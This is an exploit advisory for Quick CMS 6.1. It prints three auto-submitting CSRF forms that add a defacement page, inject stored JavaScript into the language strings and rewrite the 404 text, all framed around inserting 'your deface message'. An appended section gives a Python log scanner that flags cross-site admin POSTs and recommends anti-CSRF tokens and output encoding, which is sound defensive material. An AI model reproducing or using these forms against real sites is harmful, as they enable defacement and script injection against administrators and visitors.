Quick CMS version 6.1 suffers from cross-site request forgery and cross-site scripting vulnerabilities.
8854dace4f9cbaee5314c4c8af2d0f77520ac18d7478291cd4888679dca4041b
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : Quick CMS CSRF/XSS
-# Vendor Homepage: http://opensolution.org
-# Software Link:
-# http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip
-# Version : 6.1
-# Date: 2016-21-01
-# Tested On : Windows 7 / FireFox
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit to create a deface page
-# [Text] is your deface message
-# Path of the page is: http://target.com/?(X)
-# Exploit code:
<form name="addpage" method="POST"
action="http://[URL]/admin.php?p=pages-form">
<input type="hidden" name="sName" value="Title Of Page" />
<input type="hidden" name="sDescriptionFull" value="[Text]" />
<input type="hidden" name="iStatus" value="1" />
<input type="hidden" name="sUrl" value="(X)" />
<input type="hidden" name="iPosition" value="0" />
<input type="hidden" name="iMenu" value="1" />
<input type="hidden" name="iTheme" value="1" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('addpage.submit()',1);
</script>
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit for XSS/CSRF:
-# The <script>alert(/xss/)</script> part of the "Pages" value is your JS code
<form name="xss" method="POST"
action="http://[URL]/admin.php?p=languages&sLangEdit=en">
<input type="hidden" name="Pages"
value="Pages<script>alert(/xss/)</script>" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('xss.submit()',1);
</script>
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit to edit the Error 404 text:
<form name="notfound" method="POST"
action="http://[URL]/admin.php?p=languages&sLangEdit=en">
<input type="hidden" name="404_error" value="title+of+page" />
<input type="hidden" name="Data_not_found" value="deface+message" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('notfound.submit()',1);
</script>
------------------------------------------
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Discovered by : Amir.ght -#-#
#-# Author : Ashiyane Digital Security Team -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
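
Detection note (an added example, not part of the original advisory or of Quick.Cms): all three forms above POST to admin.php with p=pages-form or p=languages from a page hosted elsewhere, so the admin's browser sends a foreign or empty Referer. The script below flags such requests in a web server access log; the Combined Log Format, the host name cms.example and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# State-changing admin actions named in the advisory (admin.php?p=...).
SENSITIVE_PAGES = {"pages-form", "languages"}

# Combined Log Format: ip - user [time] "METHOD path proto" status bytes "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious_admin_posts(lines, site_host):
    """Return (time, ip, page, reason) for admin POSTs not referred by site_host."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparsable line or not a state-changing request
        url = urlsplit(m["path"])
        if not url.path.endswith("/admin.php"):
            continue
        page = parse_qs(url.query).get("p", [""])[0]
        if page not in SENSITIVE_PAGES:
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "missing Referer"
        else:
            ref_host = (urlsplit(referer).hostname or "").lower()
            if ref_host == site_host.lower():
                continue  # submitted from the site's own admin panel
            reason = f"cross-site Referer: {ref_host or referer}"
        findings.append((m["time"], m["ip"], page, reason))
    return findings

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2016:10:00:01 +0000] "POST /admin.php?p=pages-form HTTP/1.1" 200 512 "http://cms.example/admin.php?p=pages-form" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Jan/2016:10:05:12 +0000] "POST /admin.php?p=pages-form HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Jan/2016:10:05:40 +0000] "POST /admin.php?p=languages&sLangEdit=en HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [21/Jan/2016:10:06:02 +0000] "GET /admin.php?p=languages HTTP/1.1" 200 900 "http://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in suspicious_admin_posts(SAMPLE_LOG, "cms.example"):
        print(*finding, sep=" | ")
```

A missing Referer can also come from browser privacy settings, so treat those hits as leads to review rather than confirmed forgeries. Log review only finds requests after the fact; the fix on the application side is a per-session anti-CSRF token on every admin form and HTML-encoding of language strings on output.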